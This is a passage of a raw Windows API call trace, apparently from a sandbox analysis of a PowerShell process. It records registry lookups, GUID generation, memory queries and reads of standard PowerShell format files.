samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x314) returned 0x0 [0044.543] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.543] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.543] RegCloseKey (hKey=0x314) returned 0x0 [0044.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.544] GetLastError () returned 0x0 [0044.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.544] GetLastError () returned 0x0 [0044.546] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x3518b256, Data2=0x7b3d, Data3=0x4233, Data4=([0]=0x9d, [1]=0x9a, [2]=0xe4, [3]=0xd3, [4]=0x1, [5]=0xac, [6]=0x5a, [7]=0xc4))) returned 0x0 [0044.546] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x6629bccd, Data2=0x1b32, Data3=0x447b, Data4=([0]=0xa8, [1]=0xa3, [2]=0xb6, [3]=0xa5, [4]=0xc5, [5]=0xaa, [6]=0x39, [7]=0xd0))) returned 0x0 [0044.547] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xbeb59ae9, Data2=0x9b1f, Data3=0x4d16, Data4=([0]=0xb7, [1]=0xb0, [2]=0xfc, [3]=0xef, [4]=0xa4, [5]=0x4d, [6]=0x25, [7]=0xc2))) returned 0x0 [0044.547] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1eae4720, Data2=0xfd01, Data3=0x45a9, Data4=([0]=0x90, [1]=0xe3, [2]=0x7a, [3]=0x85, [4]=0xcb, [5]=0xc8, [6]=0x7d, [7]=0x72))) returned 0x0 [0044.547] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x396ee13d, Data2=0x587c, Data3=0x407e, Data4=([0]=0x88, [1]=0x98, [2]=0x1a, [3]=0x9b, [4]=0xc1, [5]=0x3a, [6]=0xfc, [7]=0xe2))) returned 0x0 [0044.547] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xb7dda87d, Data2=0x29f5, Data3=0x4ac5, Data4=([0]=0x92, [1]=0xf, [2]=0xeb, [3]=0x10, [4]=0xfd, [5]=0x6a, [6]=0xbb, [7]=0x7d))) returned 0x0 [0044.547] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.547] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xa3d107ca, Data2=0x2178, Data3=0x4067, Data4=([0]=0x94, [1]=0x89, [2]=0xa8, [3]=0x9b, [4]=0xf4, [5]=0x24, [6]=0xb6, [7]=0xf9))) returned 0x0 [0044.547] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.547] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.548] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x51f9b5af, Data2=0xdf2e, Data3=0x44d9, Data4=([0]=0x94, [1]=0x95, [2]=0xf0, [3]=0xc8, [4]=0xf3, [5]=0xe4, [6]=0x78, [7]=0x8a))) returned 0x0 [0044.548] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x89a7ca2d, Data2=0xf2f1, Data3=0x4034, Data4=([0]=0x93, [1]=0xe0, [2]=0xc3, [3]=0x4f, [4]=0x4a, [5]=0x7d, [6]=0x93, [7]=0xd9))) returned 0x0 [0044.548] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xfd076b48, Data2=0xbdba, Data3=0x4ced, Data4=([0]=0xae, [1]=0xe8, [2]=0x1a, [3]=0x19, [4]=0x1e, [5]=0xea, [6]=0xd0, [7]=0xc7))) returned 0x0 [0044.548] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc1d9bb39, Data2=0x629f, Data3=0x4e45, Data4=([0]=0xba, [1]=0x3b, [2]=0xc4, [3]=0x14, [4]=0x7e, [5]=0xf4, [6]=0xc1, [7]=0x24))) returned 0x0 [0044.548] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.548] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xe41e8268, Data2=0x8d4f, Data3=0x487f, Data4=([0]=0xae, [1]=0xc6, [2]=0x52, [3]=0xa4, [4]=0x11, [5]=0x3d, [6]=0xae, [7]=0x69))) returned 0x0 [0044.548] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.548] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.549] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.549] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.549] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.550] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x5ecb44bf, Data2=0xaed4, Data3=0x4841, Data4=([0]=0x8c, [1]=0xe, [2]=0x64, [3]=0xf, [4]=0x43, [5]=0xf5, [6]=0xe6, [7]=0xdb))) returned 0x0 [0044.550] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1067216b, Data2=0x5368, Data3=0x4345, Data4=([0]=0xae, [1]=0x6b, [2]=0x44, [3]=0x31, [4]=0x40, [5]=0x73, [6]=0xac, [7]=0x53))) returned 0x0 [0044.550] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc8272e6e, Data2=0x322, Data3=0x42df, Data4=([0]=0xbd, [1]=0x9e, [2]=0x95, [3]=0xf, [4]=0xab, [5]=0x32, [6]=0xd6, [7]=0xf9))) returned 0x0 [0044.550] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc1cd4f07, Data2=0xa4d, Data3=0x4b59, Data4=([0]=0xaa, [1]=0x1d, [2]=0xe8, [3]=0x75, [4]=0x6d, [5]=0x62, [6]=0x93, [7]=0x62))) returned 0x0 [0044.550] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xe32f821a, Data2=0x4b1d, Data3=0x4ca4, Data4=([0]=0x9f, [1]=0x20, [2]=0xd0, [3]=0x38, [4]=0x1d, [5]=0x29, [6]=0xeb, [7]=0x69))) returned 0x0 [0044.550] VirtualQuery (in: lpAddress=0x25d214, lpBuffer=0x25e214, dwLength=0x1c | out: lpBuffer=0x25e214*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.550] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x99ac7fa5, Data2=0x5391, Data3=0x4d1e, Data4=([0]=0x8e, [1]=0x6f, [2]=0xff, [3]=0xf0, [4]=0x53, [5]=0x79, [6]=0x81, [7]=0xaf))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x6a2b4f40, Data2=0x3cfc, Data3=0x4ce3, Data4=([0]=0xb2, [1]=0x36, [2]=0xc2, [3]=0xd5, [4]=0x72, [5]=0xb5, [6]=0xdb, [7]=0xc9))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xd51f7190, Data2=0xd89e, Data3=0x4b1f, Data4=([0]=0x8c, [1]=0xfe, [2]=0x26, [3]=0x49, [4]=0x5b, [5]=0xce, [6]=0xfa, [7]=0xfd))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x244240a5, Data2=0xde35, Data3=0x4a81, Data4=([0]=0xac, [1]=0x71, [2]=0x46, [3]=0x83, [4]=0x47, [5]=0xc4, [6]=0xf8, [7]=0xf5))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xaf92aba1, Data2=0xeffc, Data3=0x4ee1, Data4=([0]=0xaf, [1]=0x12, [2]=0x57, [3]=0xb5, [4]=0x81, [5]=0x6, [6]=0x53, [7]=0x46))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x734abc75, Data2=0xae6a, Data3=0x416f, Data4=([0]=0x98, [1]=0xef, [2]=0x65, [3]=0xb1, [4]=0x44, [5]=0xa5, [6]=0x65, [7]=0xc6))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x4c49a0aa, Data2=0xf1ab, Data3=0x4c6f, Data4=([0]=0xa9, [1]=0x73, [2]=0xed, [3]=0xa7, [4]=0xde, [5]=0x1, [6]=0xb3, [7]=0xf0))) returned 0x0 [0044.551] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9b5a2de6, Data2=0x1cba, Data3=0x4b55, Data4=([0]=0x8f, [1]=0xc9, [2]=0xf9, [3]=0x64, [4]=0xe1, [5]=0xc5, [6]=0x31, [7]=0x0))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xed06f7df, Data2=0x27c6, Data3=0x426d, Data4=([0]=0xac, [1]=0xa, [2]=0x8c, [3]=0x7d, [4]=0x45, [5]=0xc4, [6]=0x49, [7]=0xab))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xeb23f86, Data2=0xfd80, Data3=0x4438, Data4=([0]=0x85, [1]=0x3e, [2]=0x2c, [3]=0xde, [4]=0x55, [5]=0xc7, [6]=0xdb, [7]=0x69))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x8cbe2de6, Data2=0xd5d7, Data3=0x4897, Data4=([0]=0x97, [1]=0xf6, [2]=0x15, [3]=0xa7, [4]=0x97, [5]=0x40, [6]=0xc5, [7]=0x53))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1ab6a967, Data2=0xe372, Data3=0x4601, Data4=([0]=0x8f, [1]=0x53, [2]=0x6e, [3]=0x22, [4]=0xac, [5]=0x56, [6]=0x9d, [7]=0xa1))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x8d98d865, Data2=0x4211, Data3=0x441d, Data4=([0]=0x87, [1]=0x89, [2]=0x27, [3]=0x93, [4]=0x87, [5]=0x78, [6]=0xd4, [7]=0x73))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xe9d6fec2, Data2=0xdd2b, Data3=0x4f87, Data4=([0]=0x88, [1]=0x36, [2]=0x7c, [3]=0xd3, [4]=0x5d, [5]=0xd8, [6]=0x99, [7]=0x17))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x7683b842, Data2=0xf52d, Data3=0x4c5a, Data4=([0]=0x84, [1]=0xf4, [2]=0x96, [3]=0x93, [4]=0x63, [5]=0xe7, [6]=0x69, [7]=0xbd))) returned 0x0 [0044.552] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xb1dbcb62, Data2=0xd99a, Data3=0x4f35, Data4=([0]=0x80, [1]=0xab, [2]=0xdd, [3]=0xb, [4]=0xf, [5]=0x3d, [6]=0xa2, [7]=0x83))) returned 0x0 [0044.553] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x505f65c8, Data2=0xf363, Data3=0x4b21, Data4=([0]=0x87, [1]=0xd6, [2]=0xbb, [3]=0x21, [4]=0x59, [5]=0xe2, [6]=0xa5, [7]=0x30))) returned 0x0 [0044.553] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x7a34d836, Data2=0x3720, Data3=0x483c, Data4=([0]=0x8e, [1]=0xdb, [2]=0xc, [3]=0xa2, [4]=0xad, [5]=0x1, [6]=0xdf, [7]=0xee))) returned 0x0 [0044.553] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x3ac96c32, Data2=0xcc01, Data3=0x462b, Data4=([0]=0x93, [1]=0xc5, [2]=0xc8, [3]=0xd2, [4]=0x12, [5]=0x39, [6]=0xac, [7]=0x47))) returned 0x0 [0044.553] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.553] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.554] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.556] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xe327e239, Data2=0xdb6e, Data3=0x4348, Data4=([0]=0x94, [1]=0xd, [2]=0x1f, [3]=0x3, [4]=0x77, [5]=0x5b, [6]=0xdb, [7]=0xc0))) returned 0x0 [0044.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0044.556] GetLastError () returned 0x0 [0044.556] SetErrorMode (uMode=0x1) returned 0x1 [0044.556] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0044.556] GetLastError () returned 0x0 [0044.556] GetFileType (hFile=0x314) returned 0x1 [0044.556] SetErrorMode (uMode=0x1) returned 0x1 [0044.556] GetFileType (hFile=0x314) returned 0x1 [0044.556] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.557] GetLastError () returned 0x0 [0044.558] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.558] GetLastError () returned 0x0 [0044.558] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.558] GetLastError () returned 0x0 [0044.558] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.558] GetLastError () returned 0x0 [0044.559] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.559] GetLastError () returned 0x0 [0044.559] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.559] GetLastError () returned 0x0 [0044.559] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x119, lpOverlapped=0x0) returned 1 [0044.559] GetLastError () returned 0x0 [0044.559] ReadFile (in: hFile=0x314, lpBuffer=0x3106ac4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3106ac4*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.559] GetLastError () returned 0x0 [0044.559] CloseHandle (hObject=0x314) returned 1 [0044.559] GetLastError () returned 0x0 [0044.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0044.560] GetLastError () returned 0x0 [0044.560] SetErrorMode (uMode=0x1) returned 0x1 [0044.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3127ac0 | out: lpFileInformation=0x3127ac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0044.560] GetLastError () returned 0x0 [0044.560] SetErrorMode (uMode=0x1) returned 0x1 [0044.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0044.560] GetLastError () returned 0x0 [0044.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x314) returned 0x0 [0044.560] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.560] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.560] RegCloseKey (hKey=0x314) returned 0x0 [0044.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0044.560] GetLastError () returned 0x0 [0044.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0044.560] GetLastError () returned 0x0 [0044.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.561] GetLastError () returned 0x0 [0044.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.561] GetLastError () returned 0x0 [0044.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.561] GetLastError () returned 0x0 [0044.561] VirtualQuery (in: lpAddress=0x25d070, lpBuffer=0x25e070, dwLength=0x1c | out: lpBuffer=0x25e070*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.561] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x415e1210, Data2=0x87a8, Data3=0x46ef, Data4=([0]=0x83, [1]=0x70, [2]=0x31, [3]=0x1d, [4]=0x8e, [5]=0xf9, [6]=0x35, [7]=0xc8))) returned 0x0 [0044.562] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.562] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9467ca46, Data2=0xb800, Data3=0x4652, Data4=([0]=0x94, [1]=0xf1, [2]=0xbf, [3]=0xad, [4]=0x15, [5]=0xa, [6]=0xf7, [7]=0x6))) returned 0x0 [0044.562] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x31119447, Data2=0x284a, Data3=0x4757, Data4=([0]=0xae, [1]=0xf8, [2]=0x76, [3]=0xe7, [4]=0xe9, [5]=0x12, [6]=0xcb, [7]=0x3e))) returned 0x0 [0044.562] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9ec4e46c, Data2=0x5f87, Data3=0x41ff, Data4=([0]=0x85, [1]=0xa1, [2]=0xb5, [3]=0x90, [4]=0x87, [5]=0xbc, [6]=0x81, [7]=0x51))) returned 0x0 [0044.562] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.562] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0044.562] GetLastError () returned 0x0 [0044.562] SetErrorMode (uMode=0x1) returned 0x1 [0044.563] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0044.563] GetLastError () returned 0x0 [0044.563] GetFileType (hFile=0x314) returned 0x1 [0044.563] SetErrorMode (uMode=0x1) returned 0x1 [0044.563] GetFileType (hFile=0x314) returned 0x1 [0044.563] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.564] GetLastError () returned 0x0 [0044.564] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.565] GetLastError () returned 0x0 [0044.565] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, 